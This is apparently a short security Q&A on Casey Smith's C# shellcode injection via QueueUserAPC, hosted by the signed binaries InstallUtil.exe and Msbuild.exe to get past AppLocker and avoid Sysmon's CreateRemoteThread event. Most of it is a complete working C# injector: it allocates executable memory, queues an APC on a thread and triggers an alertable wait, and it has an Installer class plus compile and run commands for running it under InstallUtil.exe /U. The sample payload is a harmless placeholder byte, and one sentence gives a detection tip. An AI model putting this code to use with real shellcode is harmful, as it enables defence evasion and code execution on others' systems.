One Day Sec

What tools did Casey Smith share to execute APC injection and avoid Sysmon?

Casey Smith shared C# implementations that use `QueueUserAPC` for shellcode injection, written to be hosted by `InstallUtil.exe` and `Msbuild.exe`. Both are Microsoft-signed binaries that ship with the .NET Framework, so application whitelisting policies such as AppLocker commonly allow them, and each will execute attacker-supplied code (an installer class's `Uninstall` method under `InstallUtil.exe /U`, an inline task under `Msbuild.exe`). The code, published on GitHub, queues the payload as a user-mode APC on an existing thread instead of creating a new one, so no `CreateRemoteThread` call is made and Sysmon never emits Event ID 8 (CreateRemoteThread) for it. Sysmon still records the process creation (Event ID 1) of `InstallUtil.exe` or `Msbuild.exe`, so hunting for those binaries launched with unusual parents or command lines remains the practical detection.
Tags: Casey Smith, C#, InstallUtil.exe, Msbuild.exe, shellcode injection, QueueUserAPC
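As an added example (not Casey Smith's code and not taken from his GitHub repositories), the `QueueUserAPC` sequence in C#, shaped so the same class can be executed by `InstallUtil.exe /U`. It shows the same-process variant: the APC is queued onto the calling thread, so no `OpenProcess`/`VirtualAllocEx`/`WriteProcessMemory` step is needed. The payload is a constructed single-byte x64 `ret` stub standing in for real shellcode, and the `ApcDemo`/`Hosted` names and the P/Invoke declarations are the example's own.

```csharp
// Added example, not code from Casey Smith's repositories: same-process QueueUserAPC
// execution in C#, with an Installer subclass so InstallUtil.exe /U can host it.
using System;
using System.Collections;
using System.ComponentModel;
using System.Configuration.Install;      // reference System.Configuration.Install.dll
using System.Runtime.InteropServices;

public static class ApcDemo
{
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize,
                                      uint flAllocationType, uint flProtect);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr OpenThread(uint dwDesiredAccess, bool bInheritHandle, uint dwThreadId);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern uint QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);

    [DllImport("kernel32.dll")]
    static extern uint GetCurrentThreadId();

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern uint SleepEx(uint dwMilliseconds, bool bAlertable);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool CloseHandle(IntPtr hObject);

    const uint MEM_COMMIT = 0x1000, MEM_RESERVE = 0x2000, PAGE_EXECUTE_READWRITE = 0x40;
    const uint THREAD_SET_CONTEXT = 0x0010;   // the only access right QueueUserAPC needs
    const uint WAIT_IO_COMPLETION = 0xC0;     // SleepEx returns this when an APC ran

    // Constructed placeholder payload: a single x64 RET. The APC routine receives its
    // argument in RCX and a bare RET hands control straight back to the APC dispatcher,
    // so the whole sequence runs without the payload doing anything else.
    public static readonly byte[] NopShellcode = { 0xC3 };

    // Returns true when the APC was delivered and executed on the target thread.
    public static bool Run(byte[] payload)
    {
        if (IntPtr.Size != 8)
            throw new PlatformNotSupportedException("placeholder payload is x64 only");

        IntPtr mem = VirtualAlloc(IntPtr.Zero, (UIntPtr)(uint)payload.Length,
                                  MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        if (mem == IntPtr.Zero)
            throw new InvalidOperationException("VirtualAlloc: " + Marshal.GetLastWin32Error());
        Marshal.Copy(payload, 0, mem, payload.Length);

        // Queue onto an existing thread (here the calling thread) rather than creating
        // one: there is no CreateThread/CreateRemoteThread, hence no Sysmon Event ID 8.
        IntPtr hThread = OpenThread(THREAD_SET_CONTEXT, false, GetCurrentThreadId());
        if (hThread == IntPtr.Zero)
            throw new InvalidOperationException("OpenThread: " + Marshal.GetLastWin32Error());
        try
        {
            if (QueueUserAPC(mem, hThread, IntPtr.Zero) == 0)
                throw new InvalidOperationException("QueueUserAPC: " + Marshal.GetLastWin32Error());
            // A user-mode APC only runs once its thread enters an alertable wait.
            return SleepEx(1, true) == WAIT_IO_COMPLETION;
        }
        finally
        {
            CloseHandle(hThread);
        }
    }

    public static void Main()
    {
        Console.WriteLine(Run(NopShellcode) ? "APC delivered" : "APC not delivered");
    }
}

// InstallUtil.exe /logfile= /LogToConsole=false /U ApcDemo.exe  invokes Uninstall()
// on every [RunInstaller(true)] class in the assembly, so the same code runs under
// a Microsoft-signed host without its own Main ever being called.
[RunInstaller(true)]
public class Hosted : Installer
{
    public override void Uninstall(IDictionary savedState)
    {
        ApcDemo.Run(ApcDemo.NopShellcode);
    }
}
```

Compile with `csc.exe /r:System.Configuration.Install.dll ApcDemo.cs` and run it directly, or hand the resulting `ApcDemo.exe` to `InstallUtil.exe /U` as in the comment. The alertable wait is the part that matters operationally: a user APC sits in the queue until its thread calls `SleepEx`, `WaitForSingleObjectEx` or a similar function with the alertable flag set, which this example does itself; when the target is a thread in another process, the injector has to wait for, or provoke, that state before the payload runs.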
